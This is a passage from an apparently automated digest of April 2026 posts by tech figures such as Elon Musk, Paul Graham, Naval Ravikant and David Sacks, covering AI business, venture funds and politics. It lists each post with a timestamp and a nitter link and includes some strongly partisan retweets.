game.…\n[原文链接](https://nitter.net/GergelyOrosz/status/2048454331645481034#m)\n\n---\n\n### ✅ @elonmusk — Elon Musk(18 条)\n\n**[2026-04-27T03:11:45+00:00]**\n> Grok Imagine\n[原文链接](https://nitter.net/elonmusk/status/2048600964102246438#m)\n\n**[2026-04-27T02:26:57+00:00]**\n> Curiosity & adventure are my philosophy https://grok.com/share/bGVnYWN5_d70e0164-cced-4096-99cb-38604067aa7a\n[原文链接](https://nitter.net/elonmusk/status/2048589691054694406#m)\n\n**[2026-04-26T23:22:48+00:00]**\n> Remember this\n[原文链接](https://nitter.net/elonmusk/status/2048543344746250466#m)\n\n**[2026-04-26T22:50:49+00:00]**\n> Grad school indoctrination camps\n[原文链接](https://nitter.net/elonmusk/status/2048535299102265720#m)\n\n**[2026-04-26T21:21:33+00:00]**\n> RT by @elonmusk: 🚨BREAKING: I found Cole Allen's archived tweets. He predicted \"Kamala wins all swing states,\" compared Trump's win to “Nazis getting elected,” and moved to Bluesky. The scary part: h…\n[原文链接](https://nitter.net/KanekoaTheGreat/status/2048512831692452091#m)\n\n**[2026-04-26T17:37:26+00:00]**\n> Accurate\n[原文链接](https://nitter.net/elonmusk/status/2048456433981591867#m)\n\n**[2026-04-26T17:27:34+00:00]**\n> RT by @elonmusk: Falcon 9 launches 25 @Starlink satellites from California\n[原文链接](https://nitter.net/SpaceX/status/2048453949381091634#m)\n\n**[2026-04-26T17:05:40+00:00]**\n> RT by @elonmusk: In shocking news, calling your political opponents Nazis makes crazy people want to kill them. Who could have predicted this?\n[原文链接](https://nitter.net/KonstantinKisin/status/2048448438715445382#m)\n\n**[2026-04-26T16:14:38+00:00]**\n> RT by @elonmusk: 25% of very liberal people say political violence can “sometimes be justified.” Among very conservative people it’s just 3%. In other words, the far left is 8x more likely to support…\n[原文链接](https://nitter.net/RobertMSterling/status/2048435593244237849#m)\n\n**[2026-04-26T15:48:07+00:00]**\n> If they’re willing to die to assassinate, imagine what they will do if they gain political power\n[原文链接](https://nitter.net/elonmusk/status/2048428921536868583#m)\n\n**[2026-04-26T15:42:09+00:00]**\n> RT by @elonmusk: Deployment of 25 @Starlink satellites confirmed\n[原文链接](https://nitter.net/SpaceX/status/2048427420366324024#m)\n\n**[2026-04-26T13:13:50+00:00]**\n> RT by @elonmusk: How do you think the left redistributes wealth? Violence How do you think the left seizes the means of production? Violence How do you think they censor and surveil opponents? Violen…\n[原文链接](https://nitter.net/TheAliceSmith/status/2048390094529216982#m)\n\n**[2026-04-26T05:24:02+00:00]**\n> Yeah\n[原文链接](https://nitter.net/elonmusk/status/2048271866914083172#m)\n\n**[2026-04-26T05:21:53+00:00]**\n> Major\n[原文链接](https://nitter.net/elonmusk/status/2048271324577952130#m)\n\n**[2026-04-26T05:04:42+00:00]**\n> RT by @elonmusk: FSD v14.3.2 has been driving me all over LA tonight. This build is f-ing incredible, smooth as butter and it’s fascinating how well it can handle complex traffic scenarios, road clos…\n[原文链接](https://nitter.net/BLKMDL3/status/2048267000359874797#m)\n\n**[2026-04-26T05:02:42+00:00]**\n> RT by @elonmusk: \"You can make an AI go insane if you force it to believe things that aren't true - AI must be maximally truth-seeking\" —Elon Musk\n[原文链接](https://nitter.net/XFreeze/status/2048266495059181608#m)\n\n**[2026-04-26T04:45:30+00:00]**\n> RT by @elonmusk: \"Left wing violence is the problem in America. Charlie Kirk was murde*ed by a left wing radical. President was almost kil*ed. We have a real crisis where there are far too many left …\n[原文链接](https://nitter.net/cb_doge/status/2048262166671950249#m)\n\n**[2026-04-26T04:07:04+00:00]**\n> RT by @elonmusk: This is true only if you start after 9/11, exclude all BLM rioting, and count all killings by white prison gangs - but not minority ones like the Black Guerilla Family and La Raza (\"…\n[原文链接](https://nitter.net/wil_da_beast630/status/2048252497098080275#m)\n\n---\n\n### ✅ @paulg — Paul Graham(20 条)\n\n**[2026-04-27T10:01:28+00:00]**\n> One of my favorite pictures. A guy I didn't know took it of us on a street in Palo Alto about 10 years ago.\n[原文链接](https://nitter.net/paulg/status/2048704073356935676#m)\n\n**[2026-04-27T09:50:40+00:00]**\n> You never need to describe something as a \"bad take.\" If it's false or irrelevant or omits something important, you can just say so. And if it's true, relevant, and complete, it's not a bad take.\n[原文链接](https://nitter.net/paulg/status/2048701354672050286#m)\n\n**[2026-04-27T08:17:48+00:00]**\n> Worrying that your startup will be eaten by the model companies is like worrying that your life will be constrained after you become a movie star. You're far more likely simply to fail.\n[原文链接](https://nitter.net/paulg/status/2048677984106664227#m)\n\n**[2026-04-27T04:08:42+00:00]**\n> RT by @paulg: Whenever I go to Paris to talk about investing in YC startups, I'm always amazed how much the French just LOVE Y Combinator. Nous t'aimons aussi, France. My French friend of @Fundoraclu…\n[原文链接](https://nitter.net/jasonfreedman/status/2048615296613937201#m)\n\n**[2026-04-26T14:48:06+00:00]**\n> RT by @paulg: Yeah okay, Lego bros, brodettes and brotheys are cooked with this one. GPT 2 Image can create full Lego sets! With actual Bricklink IDs so you can order the parts and build it. Whole ne…\n[原文链接](https://nitter.net/DennisonBertram/status/2048413815675539816#m)\n\n**[2026-04-26T14:47:09+00:00]**\n> Every post, I block and report a couple accounts using AI-generated replies. It feels much the same as picking up litter on a city street; I don't know if it has any effect, but it feels like I ought…\n[原文链接](https://nitter.net/paulg/status/2048413578789634100#m)\n\n**[2026-04-26T14:40:28+00:00]**\n> Durer was the original Dr Seuss.\n[原文链接](https://nitter.net/paulg/status/2048411898081583547#m)\n\n**[2026-04-26T14:36:59+00:00]**\n> Writing a talk to give in Stockholm. The prospect of speaking to a large group of people is no longer frightening, but writing a talk is as much work as ever. I'm no longer afraid of audiences, but I…\n[原文链接](https://nitter.net/paulg/status/2048411021329453562#m)\n\n**[2026-04-26T13:37:21+00:00]**\n> RT by @paulg: 'Action is now needed': Over 60 ex-U.K. ambassadors call to sanction Israel over West Bank https://www.haaretz.com/west-bank/2026-04-26/ty-article/.premium/over-60-ex-uk-ambassadors-cal…\n[原文链接](https://nitter.net/haaretzcom/status/2048396013816152216#m)\n\n**[2026-04-26T11:57:10+00:00]**\n> Good use of camouflage by Biscuit.\n[原文链接](https://nitter.net/paulg/status/2048370801833828507#m)\n\n**[2026-04-25T14:17:57+00:00]**\n> RT by @paulg: Journalists worldwide should stand up for colleagues who are murdered.\n[原文链接](https://nitter.net/NickKristof/status/2048043843690561556#m)\n\n**[2026-04-25T13:02:57+00:00]**\n> Edith and Shahed from Noora Health came to visit. They've saved over 75,000 lives so far. A small city of people.\n[原文链接](https://nitter.net/paulg/status/2048024967996993760#m)\n\n**[2026-04-25T12:34:34+00:00]**\n> RT by @paulg: Here's YC's official advice about being truthful and precise about what is pilot, bookings, revenue and recurring revenue. Founders, particularly first time founders, need to sear this …\n[原文链接](https://nitter.net/garrytan/status/2048017824895909901#m)\n\n**[2026-04-25T12:32:40+00:00]**\n> Whoah, self-driving cars compete with airlines. I never considered that till now.\n[原文链接](https://nitter.net/paulg/status/2048017345000415744#m)\n\n**[2026-04-25T10:55:23+00:00]**\n> RT by @paulg: 23 years old with no advanced mathematics training solves Erdős problem with ChatGPT Pro. \"What’s beginning to emerge is that the problem was maybe easier than expected, and it was like…\n[原文链接](https://nitter.net/Ananyo/status/2047992864118894954#m)\n\n**[2026-04-25T08:33:48+00:00]**\n> RT by @paulg: GitHub outages since Microsoft acquisition 🤣\n[原文链接](https://nitter.net/vaggelisdrak/status/2047957234664030380#m)\n\n**[2026-04-25T07:44:30+00:00]**\n> Hamming's talk is so important that I reproduced it on my site. It's one of the only things on my site written by someone else. https://paulgraham.com/hamming.html\n[原文链接](https://nitter.net/paulg/status/2047944827887591681#m)\n\n**[2026-04-25T07:35:28+00:00]**\n> R to @paulg: Auction houses could fix this by giving you timegrapher numbers. But the only auction house that does this so far is a small Swiss one that specializes in watches (Ineichen). None of the…\n[原文链接](https://nitter.net/paulg/status/2047942555254288757#m)\n\n**[2026-04-25T07:30:15+00:00]**\n> The best way to buy art is at auction, once you know what you're doing. But old watches you should buy from dealers. You can get enough information about paintings to judge their condition, but you h…\n[原文链接](https://nitter.net/paulg/status/2047941243234107691#m)\n\n**[2026-04-24T19:36:00+00:00]**\n> RT by @paulg: BREAKING: A Syrian billionaire needed U.S. sanctions lifted so he could cash in on $12 billion in reconstruction contracts, per NYT. In an attempt to influence American foreign policy, …\n[原文链接](https://nitter.net/unusual_whales/status/2047761493274571036#m)\n\n---\n\n### ✅ @naval — Naval Ravikant(14 条)\n\n**[2026-04-24T11:53:43+00:00]**\n> RT by @naval: Fundrise VCX is exactly why USVC needs to exist. Retail wants access to OpenAI, Anthropic, SpaceX, xAI, etc. That demand is not going away. VCX turned that demand into a liquid public w…\n[原文链接](https://nitter.net/alexbass/status/2047645157080658335#m)\n\n**[2026-04-24T05:39:10+00:00]**\n> R to @naval: x.com/avlok/status/204754692…\n[原文链接](https://nitter.net/naval/status/2047550896670908809#m)\n\n**[2026-04-24T05:23:22+00:00]**\n> RT by @naval: I’ve seen a lot of questions about USVC, AngelList’s newest product. First, don’t invest in venture capital if you can’t afford to lose your money. Put your savings somewhere safer. But…\n[原文链接](https://nitter.net/avlok/status/2047546920747307466#m)\n\n**[2026-04-24T03:37:14+00:00]**\n> Hari nails it: “Don’t listen to people who don’t know how private markets work.”\n[原文链接](https://nitter.net/naval/status/2047520212787015748#m)\n\n**[2026-04-24T03:33:25+00:00]**\n> R to @naval: x.com/haridigresses/status/2…\n[原文链接](https://nitter.net/naval/status/2047519250433421604#m)\n\n**[2026-04-24T02:58:19+00:00]**\n> R to @naval: x.com/nivi/status/2047471220…\n[原文链接](https://nitter.net/naval/status/2047510419565420779#m)\n\n**[2026-04-24T01:01:28+00:00]**\n> RT by @naval: USVC is a new fund being offered by Naval, it's been discussed widely on X. I have some thoughts and why people should look into it. I have no connection with it and not being paid to s…\n[原文链接](https://nitter.net/Cernovich/status/2047481012826124516#m)\n\n**[2026-04-24T00:22:33+00:00]**\n> RT by @naval: I spent the morning digging into USVC fees. TLDR: In my opinion, there is no lower-cost way to invest in VC other than becoming one. I’m expecting to pay the same or less than it costs …\n[原文链接](https://nitter.net/nivi/status/2047471220451578132#m)\n\n**[2026-04-23T15:20:52+00:00]**\n> RT by @naval: We launched USVC yesterday and it was one of the most fun days of my career Thousands of people ended up subscribing for literally tens of millions of dollars While most of the receptio…\n[原文链接](https://nitter.net/ankurnagpal/status/2047334901033123913#m)\n\n**[2026-04-22T16:34:52+00:00]**\n> Introducing USVC - a single basket of high-growth venture capital, for everyone. No accreditation required, SEC-registered, and a very low $500 minimum. Includes OpenAI, Anthropic, xAI, Sierra, Cruso…\n[原文链接](https://nitter.net/naval/status/2046991137022648800#m)\n\n**[2026-04-22T14:36:51+00:00]**\n> RT by @naval: Announcing my new thing: I'm launching a new public venture fund USVC is built by AngelList with @naval shaping our investment strategy in the technology companies building our future A…\n[原文链接](https://nitter.net/ankurnagpal/status/2046961436593713241#m)\n\n**[2026-04-20T03:08:16+00:00]**\n> RT by @naval: One union spends more on political contributions in Washington than the entire tech industry.\n[原文链接](https://nitter.net/pmddomingos/status/2046063371951464753#m)\n\n**[2026-04-15T02:00:50+00:00]**\n> Truth, love, and beauty are all pursued for their own sake, even if they make us worse off.\n[原文链接](https://nitter.net/naval/status/2044234462972784792#m)\n\n**[2026-04-02T08:13:05+00:00]**\n> Vibe coding is more addictive than any video game ever made (if you know what you want to build).\n[原文链接](https://nitter.net/naval/status/2039617101221224858#m)\n\n---\n\n### ✅ @eladgil — Elad Gil(20 条)\n\n**[2026-04-26T02:40:47+00:00]**\n> Saturday song https://youtu.be/D8MoLNxLE98?si=yRsm9viuy3NYvnJ0\n[原文链接](https://nitter.net/eladgil/status/2048230781739581745#m)\n\n**[2026-04-24T18:44:49+00:00]**\n> RT by @eladgil: Adopting Claude speak in my regular life, episode 1: Partner: Did you do the dishes tonight? Me: Yes they're done. Partner: Why are they still dirty? Me: You're right to push back. I …\n[原文链接](https://nitter.net/awnihannun/status/2047748613976264835#m)\n\n**[2026-04-24T01:35:02+00:00]**\n> New life plan- Move to Brooklyn Get neck tat Ride bike everywhere Cold brew own coffee (also start drinking coffee) Adopt 12 year old stray cat, name him Nietzsche Vape mango pods, but ironically Wea…\n[原文链接](https://nitter.net/eladgil/status/2047489459378397604#m)\n\n**[2026-04-23T21:04:47+00:00]**\n> RT by @eladgil: How does one make sense of SF? We are living through the craziest computing revolution of the last 2 decades....and 95% of the value being created is within a 4-mile radius in SF (h/t…\n[原文链接](https://nitter.net/adityaag/status/2047421448449630379#m)\n\n**[2026-04-23T17:55:03+00:00]**\n> Entrepreneurship is a distributed search job across the surface of commercial opportunities\n[原文链接](https://nitter.net/eladgil/status/2047373700643844303#m)\n\n**[2026-04-23T17:20:32+00:00]**\n> Big congrats\n[原文链接](https://nitter.net/eladgil/status/2047365014500389353#m)\n\n**[2026-04-23T17:19:56+00:00]**\n> My view is the AI boom will only accelerate and is a once in a lifetime transformation This is orthogonal to whether many AI companies should exit in next 12-18 months, as some may lack durability vs…\n[原文链接](https://nitter.net/eladgil/status/2047364865527075139#m)\n\n**[2026-04-22T20:39:39+00:00]**\n> <3 @infisical\n[原文链接](https://nitter.net/eladgil/status/2047052737762980083#m)\n\n**[2026-04-21T22:45:48+00:00]**\n> What a time to be alive\n[原文链接](https://nitter.net/eladgil/status/2046722094348771758#m)\n\n**[2026-04-21T20:58:54+00:00]**\n> 👀\n[原文链接](https://nitter.net/eladgil/status/2046695194054320150#m)\n\n**[2026-04-21T19:36:05+00:00]**\n> The dark alchemy that is loonen sparkling + salt of the earth electrolytes 😱\n[原文链接](https://nitter.net/eladgil/status/2046674350993223784#m)\n\n**[2026-04-21T17:21:44+00:00]**\n> AI for email++\n[原文链接](https://nitter.net/eladgil/status/2046640542218604783#m)\n\n**[2026-04-20T23:50:03+00:00]**\n> 🔥\n[原文链接](https://nitter.net/eladgil/status/2046375878368940239#m)\n\n**[2026-04-20T18:51:07+00:00]**\n> R to @eladgil: Link to fuller post: https://substack.com/home/post/p-194229552?source=queue\n[原文链接](https://nitter.net/eladgil/status/2046300649483374704#m)\n\n**[2026-04-20T17:46:29+00:00]**\n> Here is the sbstack version \"Random thoughts while gazing at the misty AI Frontier\" https://blog.eladgil.com/p/random-thoughts-while-gazing-at-the\n[原文链接](https://nitter.net/eladgil/status/2046284381439103043#m)\n\n**[2026-04-20T17:45:44+00:00]**\n> R to @eladgil: 13/12 Anti-AI regulation & violence will both increase It is important for leaders in tech and AI to point out the benefits of AI to society and the world more aggressively\n[原文链接](https://nitter.net/eladgil/status/2046284194943500453#m)\n\n**[2026-04-20T17:45:44+00:00]**\n> R to @eladgil: 12/12 Most AI companies should consider exiting in the next 12-18 months\n[原文链接](https://nitter.net/eladgil/status/2046284191885922498#m)\n\n**[2026-04-20T17:45:43+00:00]**\n> R to @eladgil: 11/12 AI is about selling work, not software. Units of labor as the product This is a big shift in TAM, agents, how to build product in the AI era. Many AI markets are 10-100X the size…\n[原文链接](https://nitter.net/eladgil/status/2046284190132609299#m)\n\n**[2026-04-20T17:45:43+00:00]**\n> R to @eladgil: 10/12 Harness creating more and more stickiness to models If you look at the use of AI coding tools, the harness (and broader product surface area eg UX, workflow, etc) seems to be inc…\n[原文链接](https://nitter.net/eladgil/status/2046284188622737554#m)\n\n**[2026-04-20T17:45:42+00:00]**\n> R to @eladgil: 9/12 Artisanal engineers will be be increasingly unhappy inside companies. Deep artisanal “my code is my craft” and “I love creating bespoke things” engineers decreasingly happy in wor…\n[原文链接](https://nitter.net/eladgil/status/2046284184877187540#m)\n\n---\n\n### ✅ @DavidSacks — David Sacks(20 条)\n\n**[2026-04-26T20:42:24+00:00]**\n> MSM hoax factories like the Atlantic love to allege conflicts of interest without ever disclosing their own.\n[原文链接](https://nitter.net/DavidSacks/status/2048502978626113625#m)\n\n**[2026-04-26T17:37:26+00:00]**\n> RT by @DavidSacks: Accurate\n[原文链接](https://nitter.net/elonmusk/status/2048456433981591867#m)\n\n**[2026-04-26T15:03:35+00:00]**\n> RT by @DavidSacks: Cole Allen, the gunman from last night’s WH Correspondents Dinner, maintained an active online presence, especially on the leftwing social media platform Bluesky where he went by t…\n[原文链接](https://nitter.net/AndrewKolvet/status/2048417712439689346#m)\n\n**[2026-04-25T18:47:09+00:00]**\n> RT by @DavidSacks: .@POTUS: \"We want to beat China at the industry. We're leading with crypto, we're leading with AI, and I really feel I have an obligation... as a President, I have to be able to ma…\n[原文链接](https://nitter.net/RapidResponse47/status/2048111588930986354#m)\n\n**[2026-04-25T13:54:41+00:00]**\n> RT by @DavidSacks: Probably the best take I have heard on why there is so much fear around software exposure in private equity and credit because of AI From David Sacks \"Historically we only had two …\n[原文链接](https://nitter.net/BoringBiz_/status/2048037985765949537#m)\n\n**[2026-04-25T03:16:09+00:00]**\n> RT by @DavidSacks: Incredible return on investment! 💰💰💰\n[原文链接](https://nitter.net/elonmusk/status/2047877294476116184#m)\n\n**[2026-04-25T02:52:39+00:00]**\n> SPLC invested $270k in Charlottesville and got $81 million in additional donations. Extraordinary returns.\n[原文链接](https://nitter.net/DavidSacks/status/2047871382923469241#m)\n\n**[2026-04-25T02:37:36+00:00]**\n> Marc Benioff is the apex cloud founder. He and Salesforce have turned every previous technology wave to their advantage. Cloud, social, mobile, big data. I predict AI will be no different.\n[原文链接](https://nitter.net/DavidSacks/status/2047867592790946189#m)\n\n**[2026-04-25T00:55:54+00:00]**\n> RT by @DavidSacks: SACKS: “We're really lucky that [Trump] is President … when this AI revolution is happening.” JASON: “What would happen if Kamala ‘Ding Dong’ was in right now?” SACKS: “We'd have n…\n[原文链接](https://nitter.net/TheChiefNerd/status/2047842000632713369#m)\n\n**[2026-04-24T23:41:01+00:00]**\n> RT by @DavidSacks: David Sacks: We're lucky that Trump's the President when this AI revolution is happening. @Jason \"Do an alt history, Sacks, what would happen if Kamala Ding Dong was in right now?\"…\n[原文链接](https://nitter.net/jayplemons/status/2047823154655932696#m)\n\n**[2026-04-24T22:41:49+00:00]**\n> RT by @DavidSacks: POD UP! Core four is back 🚨 Big show: -- SpaceX-Cursor deal, using compute as leverage -- SaaS debt bomb coming to PE?, venture debt risk -- Software bloodbath, buy low potential? …\n[原文链接](https://nitter.net/theallinpod/status/2047808256047821141#m)\n\n**[2026-04-24T16:41:47+00:00]**\n> R to @DavidSacks: UPDATE: the DOJ has joined @xAI’s lawsuit against Colorado on First Amendment grounds. AI models should not be required to alter truthful output to comply with DEI.\n[原文链接](https://nitter.net/DavidSacks/status/2047717649849659586#m)\n\n**[2026-04-24T15:43:39+00:00]**\n> RT by @DavidSacks: David Sacks on Anthropic-Pentagon dispute, Musk-Altman feud and SpaceX-Cursor deal: https://cnb.cx/4d3HAKp\n[原文链接](https://nitter.net/SquawkCNBC/status/2047703023690924289#m)\n\n**[2026-04-24T15:10:25+00:00]**\n> RT by @DavidSacks: .@DavidSacks: \"We know that @AnthropicAI makes good products. They are smart people, there’s no question about it... we don’t care what their personal views are. What we care about…\n[原文链接](https://nitter.net/RapidResponse47/status/2047694657107165519#m)\n\n**[2026-04-24T13:41:49+00:00]**\n> R to @DavidSacks: Full article: https://www.wsj.com/lifestyle/careers/are-college-graduates-finally-catching-a-break-in-this-job-market-38c37541?st=fxk6Dg&reflink=article_copyURL_share\n[原文链接](https://nitter.net/DavidSacks/status/2047672359377588241#m)\n\n**[2026-04-24T13:39:13+00:00]**\n> Narrative violation: Hiring of new college graduates is up 5.6% over last year. Youth unemployment for degreed 20–24‑year‑olds fell to 5.3% from 8.9%. Weren’t we told that 50% of entry-level jobs wer…\n[原文链接](https://nitter.net/DavidSacks/status/2047671706660073767#m)\n\n**[2026-04-23T00:04:16+00:00]**\n> R to @DavidSacks: Full article: https://www.foxnews.com/politics/anthropics-moral-compass-architect-suggested-ai-overcorrection-could-address-historical-injustices\n[原文链接](https://nitter.net/DavidSacks/status/2047104229773279572#m)\n\n**[2026-04-23T00:03:16+00:00]**\n> Reverse discrimination does not undo historical injustices but rather perpetrates new ones against a different set of individuals. This foments social strife and undermines the ideal of America as a …\n[原文链接](https://nitter.net/DavidSacks/status/2047103978979119580#m)\n\n**[2026-04-09T23:58:23+00:00]**\n> R to @DavidSacks: I spoke out about the Colorado law last year. Given the threat to freedom of speech, all conservatives should be able to support this challenge, even if they have other concerns abo…\n[原文链接](https://nitter.net/DavidSacks/status/2042391709129326829#m)\n\n**[2026-04-09T23:54:05+00:00]**\n> Kudos to @xAI for being the first AI company to challenge a Colorado law requiring it to censor truthful answers if they could have a “differential impact” on protected groups. This is Woke AI. It te…\n[原文链接](https://nitter.net/DavidSacks/status/2042390626436792399#m)\n\n---\n\n### ✅ @jason — Jason Calacanis(19 条)\n\n**[2026-04-27T01:51:02+00:00]**\n> Incredible writing from @euphoriaHBO\n[原文链接](https://nitter.net/Jason/status/2048580651985604783#m)\n\n**[2026-04-26T19:42:30+00:00]**\n> I’ve invested in 700 private companies Providing liquidity and loans to high performing founders is completely standard. In fact, investors encourage loans and secondary sales for founders to enable …\n[原文链接](https://nitter.net/Jason/status/2048487905543237675#m)\n\n**[2026-04-26T18:14:04+00:00]**\n> Ok @Acosta, balls in your court\n[原文链接](https://nitter.net/Jason/status/2048465651723882972#m)\n\n**[2026-04-26T18:05:09+00:00]**\n> The NYTimes focus last week was micro-looting, social murder and meaningless private company transactions designed to ferment class warfare. Disgraziad\n[原文链接](https://nitter.net/Jason/status/2048463405590225173#m)\n\n**[2026-04-26T17:13:01+00:00]**\n> Who made this?!\n[原文链接](https://nitter.net/Jason/status/2048450286902235560#m)\n\n**[2026-04-26T16:21:34+00:00]**\n> I’m proud to announce I’m hosting an exhibition cage match between @Acosta and @mtracey on July 4th $100,000 cash prize Vegas 3, 3 minute rounds\n[原文链接](https://nitter.net/Jason/status/2048437340218044499#m)\n\n**[2026-04-26T16:16:34+00:00]**\n> Once again, the substack party result in a Donnybrook — it’s like the source awards for wordmaxxers\n[原文链接](https://nitter.net/Jason/status/2048436081725464959#m)\n\n**[2026-04-26T13:51:54+00:00]**\n> RT by @Jason: Random pic of @Jason protecting our $TAO bags\n[原文链接](https://nitter.net/nordin_eth/status/2048399674269213067#m)\n\n**[2026-04-26T03:57:07+00:00]**\n> The left has a serious violence problem, which @DavidSacks called out early and often. This generation of woke democratic socialists are morally bankrupt. They believe in looting and violence as a po…\n[原文链接](https://nitter.net/Jason/status/2048249992163242220#m)\n\n**[2026-04-26T03:46:17+00:00]**\n> If you’re not condemning these lunatics, you’re advocating for the end of the American empire. I’m not for canceling people, but the fact the @nytimes and @newyorker not only employees these individu…\n[原文链接](https://nitter.net/Jason/status/2048247267182658004#m)\n\n**[2026-04-26T03:40:08+00:00]**\n> Heroes 🫡\n[原文链接](https://nitter.net/Jason/status/2048245718171648271#m)\n\n**[2026-04-25T21:25:29+00:00]**\n> x.com/i/spaces/1nGeLyjZrkvKX\n[原文链接](https://nitter.net/Jason/status/2048151434928017429#m)\n\n**[2026-04-25T19:06:45+00:00]**\n> nightmare blunt rotation\n[原文链接](https://nitter.net/Jason/status/2048116521436590260#m)\n\n**[2026-04-25T19:06:07+00:00]**\n> today #knicks @mikal_bridges to 6th man/leads the bench in scoring Knicks play @23savage____ 26 minutes, he has 5 offensive boards We're up 20+ points in the second half @ATLHawks backs broken; they …\n[原文链接](https://nitter.net/Jason/status/2048116362766127514#m)\n\n**[2026-04-25T17:57:08+00:00]**\n> RT by @Jason: AngelList introduced USVC: venture investing for non-accredited investors starting at $500. Hear why Jason thinks the social media criticisms lack merit and says: \"More liquidity for in…\n[原文链接](https://nitter.net/twistartups/status/2048099001782985057#m)\n\n**[2026-04-25T15:11:10+00:00]**\n> RT by @Jason: The future of coding isn't reading lines of code. It's specifying outcomes and getting binaries back. Elon said it. Aravind from Perplexity agrees. And startups are already making it a …\n[原文链接](https://nitter.net/twistartups/status/2048057234865693125#m)\n\n**[2026-04-25T02:02:48+00:00]**\n> WTF are these lunatics up to…\n[原文链接](https://nitter.net/Jason/status/2047858837319774540#m)\n\n**[2026-04-25T01:58:52+00:00]**\n> WTF are these kids up to?!\n[原文链接](https://nitter.net/Jason/status/2047857845387845816#m)\n\n**[2026-04-24T23:01:04+00:00]**\n> RT by @Jason: Planning an event usually means juggling dozens of vendors, scattered payments, and zero visibility. It's a logistical mess. LAMAT is fixing the chaos. It's a marketplace that lets orga…\n[原文链接](https://nitter.net/LAUNCH/status/2047813100091449428#m)\n\n---\n\n### ✅ @HarryStebbings — Harry Stebbings(19 条)\n\n**[2026-04-27T13:30:16+00:00]**\n> Two areas I would love to invest that are non-technical: 1. Egg freezing clinics. In 10 years, strongly believe every 21 year old will freeze their eggs and it becomes the norm. Amazing business. Ins…\n[原文链接](https://nitter.net/HarryStebbings/status/2048756619622707452#m)\n\n**[2026-04-26T22:34:46+00:00]**\n> We hired someone for the investing team. Something I never planned to do. They sent the team 3 new deals per day for 90 days straight. All aligned to our stage, geography and deal type. That’s how yo…\n[原文链接](https://nitter.net/HarryStebbings/status/2048531257399664920#m)\n\n**[2026-04-26T19:35:39+00:00]**\n> I have interviewed 1,000 of the best CEOs of the last 10 years. Adam Foroughi, Founder @AppLovin is easily top 3, ever. $160BN Market Cap $5.48BN Revenue $10M EBITDA per head 82%+ margins Just 450 pe…\n[原文链接](https://nitter.net/HarryStebbings/status/2048486182904852537#m)\n\n**[2026-04-26T15:07:55+00:00]**\n> Seeing two types of founders emerge in this moment: The tourists and the terminators. The terminators are salivating at the opportunity ahead. Hungrier than ever. More ambitious than ever. They want …\n[原文链接](https://nitter.net/HarryStebbings/status/2048418806867870115#m)\n\n**[2026-04-26T13:56:31+00:00]**\n> The best founders I know all text their investors. None of them email them. The relationship will blossom and deepen in a matter of messages.\n[原文链接](https://nitter.net/HarryStebbings/status/2048400836024283246#m)\n\n**[2026-04-24T21:38:00+00:00]**\n> This week I got to sit down with two truly generational CEOs and ask them anything: @tobi @Shopify ($160BN Market Cap) Adam Foroughi @AppLovin ($160BN Market Cap) I have the best job in the world.\n[原文链接](https://nitter.net/HarryStebbings/status/2047792195868967172#m)\n\n**[2026-04-24T15:04:00+00:00]**\n> How Claude Design Will Hurt Figma \"Claude Design will not replace Figma directly, but it will chip away at it. It removes the need to wait for designers by letting people go straight from idea to pro…\n[原文链接](https://nitter.net/HarryStebbings/status/2047693043080261672#m)\n\n**[2026-04-23T23:43:00+00:00]**\n> Why the biggest fintech players are in for a shock. \"The shift is from human UX to agent UX. In the past, you won with dashboards, design and user experience. Now, the buyer is an AI agent, and it on…\n[原文链接](https://nitter.net/HarryStebbings/status/2047461264998478113#m)\n\n**[2026-04-23T21:23:00+00:00]**\n> I used to think MAUs and WAUs were the dumbest metric. Now I think it's the most important. \"I used to think MAUs and WAUs did not matter, now I think they are critical. In the AI era, usage is the l…\n[原文链接](https://nitter.net/HarryStebbings/status/2047426032840634830#m)\n\n**[2026-04-23T20:32:21+00:00]**\n> Slightly soppy bromance post but Jason believed in me when I was 18 and at law school still. There were next to no signs 20VC was or would be a success. He has been a dear friend ever since!\n[原文链接](https://nitter.net/HarryStebbings/status/2047413285675290984#m)\n\n**[2026-04-23T17:48:00+00:00]**\n> Does the $60BN Cursor Deal Make Sense: \"It actually makes sense when you look at what each side lacks. One has explosive revenue but weak margins due to compute and model costs. The other has massive…\n[原文链接](https://nitter.net/HarryStebbings/status/2047371926335857036#m)\n\n**[2026-04-23T16:53:42+00:00]**\n> It is a very expensive desire to be a value investor today. It is much easier to be a momentum investor, that is for sure.\n[原文链接](https://nitter.net/HarryStebbings/status/2047358263868436791#m)\n\n**[2026-04-23T14:06:50+00:00]**\n> R to @HarryStebbings: Spotify 👉 https://open.spotify.com/episode/6EjWkbt83H2WXhDMjjS7PF Youtube 👉 https://youtu.be/s61XVZAt5ns Apple Podcasts 👉 https://podcasts.apple.com/us/podcast/20vc-cursor-acqui…\n[原文链接](https://nitter.net/HarryStebbings/status/2047316269465006363#m)\n\n**[2026-04-23T14:06:50+00:00]**\n> This is the big f**king deal. Cursor acquired for $60BN by xAI I sat down with @jasonlk and @rodriscoll to discuss the deal, along with the biggest news in tech this week: - Anthropic Hits $1TRN in S…\n[原文链接](https://nitter.net/HarryStebbings/status/2047316267858645088#m)\n\n**[2026-04-22T13:07:07+00:00]**\n> I have interviewed 1,000 founders over 10 years. If I could only invest in five, this would be them: 1. Nik Storonsky (Revolut) 2. @alanchanguk (Fuse Energy) 3. Adam Foroughi (AppLovin) 4. @awxjack (…\n[原文链接](https://nitter.net/HarryStebbings/status/2046938853445959738#m)\n\n**[2026-04-21T20:17:56+00:00]**\n> I have interviewed 1,000 CEOs of the largest companies over the last 10 years. Adam Foroughi is top 5 I have ever met. Easily. AppLovin Market Cap: $160BN Revenue: $5.48BN EBITDA per Head: $10M There…\n[原文链接](https://nitter.net/HarryStebbings/status/2046684883494600911#m)\n\n**[2026-04-21T15:37:00+00:00]**\n> In a world of agents, how do software providers prevent themselves from becoming valueless databases? \"The value proposition has to be: 1. How good are your APIs? 2. How well designed are they 3. Are…\n[原文链接](https://nitter.net/HarryStebbings/status/2046614183513604299#m)\n\n**[2026-04-20T22:23:00+00:00]**\n> What Role Does Not Exist Today But Will Be So Common in Five Years Time: \"500K-1M jobs will be created for agent operators. This person will be somewhat technical. They will be deep in the AI world. …\n[原文链接](https://nitter.net/HarryStebbings/status/2046353968973160675#m)\n\n**[2026-04-20T21:26:49+00:00]**\n> TikTok follower growth and virality means nothing. Views and followers are essentially worth nothing. But it is the best testing ground on the planet to try material before taking it to Instagram and…\n[原文链接](https://nitter.net/HarryStebbings/status/2046339832922689673#m)\n\n---\n\n### ⚠️ @lmsqueegie — Lars Nielsen(获取失败)\n\n- 错误: URLError: \n\n### ✅ @david__tian — David 